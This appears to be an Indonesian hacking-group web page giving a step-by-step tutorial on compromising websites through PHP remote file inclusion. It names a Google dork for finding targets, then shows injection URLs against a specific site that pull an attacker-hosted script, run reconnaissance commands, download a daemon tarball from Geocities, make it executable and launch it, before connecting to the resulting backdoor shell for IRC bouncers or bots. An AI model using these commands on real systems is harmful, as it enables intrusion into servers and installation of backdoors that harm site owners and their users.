#Indoselingkuh
 Founder
SOP
AOP

Tutorial
Deface
Inject PHP
PsyBNC
Eggdrop

Files

Download
 Config.txt
Perintah Netgate

Lain-lain
Saran dan Kritik

Link
www.pontychat.net
www.egghelp.org
www.neoteker.or.id

www.ahmadsafei.com
www.hacking.asp
www.jasakom.com

Tutorial Inject Web dengan PHP

      Di sini akan di berikan tutorial cara menginjeck web / URL dengan php.

pertama buka "gudang dunia" www.google.com, pada box pencarian ketik : allinurl:index.php?page=

kita akan mendapat kan hasil pencarian yang banyak sekali tinggal kita coba satu per satu, mana yang bisa kita inject.

Contoh misal kita sudah mendapatkan target di:

http://www.rtme.nl/index.php?load=

Masukkan script inject kita setelah tanda "="

contoh :

http://www.rtme.nl/index.php?load=http://geocities.com/ardi_terror/arditerror.txt?&cmd=cd /var/tmp;id;ls -alF;uname -a
 

saya tidak akan memberitahukan kamu mana yang bisa dan mana yang sudah di patch web nya dari hasil perintah diatas. ternyata web tersebut ,masih dapat kita inject.lalukita masukkan perintah selanjutnya:

http://www.rtme.nl/index.php?load=http://geocities.com/ardi_terror/arditerror.txt?&cmd=cd /var/tmp;wget geocities.com/ardi_terror/x.tgz

>>>> x.tgz dapat kita ganti dengan z.tgz

Perintah tersebut untuk wget (meng copy file) program daemon kita "x.tgz"

setelah proses wget kita lanjutkan ke tahap berikutnya :


http://www.rtme.nl/index.php?load=http://geocities.com/ardi_terror/arditerror.txt?&cmd=cd /var/tmp;mv x.tgz x

lalu kita ketik lagi perintah untuk menjalankan daemon "x" kita :


http://www.rtme.nl/index.php?load=http://geocities.com//ardi_terror/arditerror.txt?&cmd=cd /var/tmp;chmod 755 x

berdoa lah pada web tersebut keluar tulisan :

Daemon is starting ok,..pid= (angka acak biasanya terdiri dari 4 - 5 angka)

sampai di sini proses inject telah selesai, tinggal tahap setting hasil inject kita .


Jalankan putty telnet portnya 5500

>>>>> (untuk daemon "x.tgz")  7319 (untuk daemon "z.tgz")
jika muncul (*&^^

 

selamat kamu sudah mendapat kan shell hasil inject php

selesai sudah

terserah kamu mo buat apa psyBNC atau Eggdrop
 

 

 

>>>> cara setting psy bnc lihat setting psybnc

>>>> cara setting eggdrop lihat setting eggdrop

 

 

kalo yang pakai password
wget geocities.com/kuugadark/red.tgz
tar zxvf red.tgz
rm -rf red.tgz
cd redones
./run
kalo ada daemonnya terbuka deh
 

 

http://www.rtme.nl/index.php?load=http://geocities.com/ardi_terror/arditerror.txt?&cmd=cd /var/tmp;./x

 

 

 

                                                                                                              Created By : Final_Heaven


Title Goes Here
Ut wisi enim ad minim veniam, quis nostrud exerci taion


Title Goes Here
Ut wisi enim ad minim veniam, quis nostrud exerci taion


Title Goes Here
Ut wisi enim ad minim veniam, quis nostrud exerci taion
Hosted by www.Geocities.ws

1